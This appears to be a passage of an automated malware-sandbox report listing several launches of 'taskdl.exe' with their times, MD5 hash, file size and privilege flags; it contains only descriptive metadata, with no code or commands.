Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	99
Start time:	03:28:42
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	104
Start time:	03:28:43
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	109
Start time:	03:28:44
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	113
Start time:	03:28:45
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true